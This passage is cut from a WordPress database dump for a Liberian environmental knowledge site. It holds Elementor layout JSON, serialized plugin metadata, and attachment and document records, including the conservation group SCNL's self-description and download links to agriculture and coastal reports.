Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20269,2965,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20270,2965,'_thumbnail_id','3223'),(20272,2965,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20274,2965,'_dp_original','2769'),(20294,2965,'_edit_lock','1629238362:42'),(20295,2965,'_edit_last','42'),(20296,2967,'_elementor_edit_mode','builder'),(20297,2967,'_elementor_template_type','wp-post'),(20298,2967,'_elementor_version','2.7.5'),(20299,2967,'_wp_page_template','default'),(20300,2967,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20301,2967,'_thumbnail_id','2963'),(20302,2967,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20304,2965,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628177268;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2769;}i:1;a:1:{s:2:\"id\";i:1614;}i:2;a:1:{s:2:\"id\";i:1582;}}}}'),(20308,2971,'_edit_lock','1629380894:42'),(20309,2971,'_edit_last','38'),(20310,2971,'_elementor_controls_usage','a:0:{}'),(20311,2971,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1628255124;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3698;}i:1;a:1:{s:2:\"id\";i:3181;}i:2;a:1:{s:2:\"id\";i:3789;}}}}'),(20312,2972,'_wp_attached_file','2020/02/CI-Liberia-NCA-Project-Manager-Advert_02032020-12.pdf'),(20343,2976,'_wp_attached_file','2020/02/tna-logo-rgb.png'),(20344,2976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:272;s:4:\"file\";s:24:\"2020/02/tna-logo-rgb.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"tna-logo-rgb-300x117.png\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"tna-logo-rgb-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20437,2986,'_wp_attached_file','2020/02/Annual-Report.pdf'),(20445,469,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1628775678;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:471;}i:1;a:1:{s:2:\"id\";i:467;}i:2;a:1:{s:2:\"id\";i:470;}}}}'),(20446,1728,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628813956;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2148;}i:1;a:1:{s:2:\"id\";i:1734;}i:2;a:1:{s:2:\"id\";i:1737;}}}}'),(20448,2988,'_wp_attached_file','2020/02/LiMA-Strategic-Plan-2019-2023-v2-2.pdf'),(20467,2989,'_elementor_controls_usage','a:0:{}'),(20468,2989,'by','CI'),(20469,2989,'year','2018'),(20470,2989,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/02/LiMA-Strategic-Plan-2019-2023-v2-2-1.pdf'),(20471,2989,'_pods_cover_image','a:1:{i:0;i:573;}'),(20472,2989,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(20475,2989,'_pods_attached_document','a:2:{i:0;i:2752;i:1;i:2990;}'),(20477,2989,'_dp_original','2751'),(20478,2989,'_edit_lock','1670324049:42'),(20479,2989,'_edit_last','42'),(20480,2990,'_wp_attached_file','2020/02/LiMA-Strategic-Plan-2019-2023-v2-2-1.pdf'),(20484,2989,'document_cover_image','1686'),(20485,2989,'attached_document','2752'),(20486,2989,'attached_document','2990'),(20487,2991,'_elementor_controls_usage','a:0:{}'),(20488,2991,'by','John F. Kannah National Consultant Agriculture Sector'),(20489,2991,'year','June 29 ,2019'),(20490,2991,'download_link','https://ekmsliberia.info/wp-content/uploads/2020/02/tna-agriculture-report-liberia.pdf'),(20491,2991,'_pods_cover_image','a:1:{i:0;i:573;}'),(20492,2991,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(20497,2991,'_dp_original','2751'),(20498,2991,'_edit_lock','1670324187:42'),(20499,2991,'_edit_last','42'),(20500,2992,'_wp_attached_file','2020/02/tna-agriculture-report-liberia.pdf'),(20502,2991,'_pods_attached_document','a:1:{i:0;i:2992;}'),(20504,2993,'_elementor_controls_usage','a:0:{}'),(20505,2993,'by','E.Tenesee WILSON National Coastal Erosion Expert Consultant'),(20506,2993,'year','July  17, 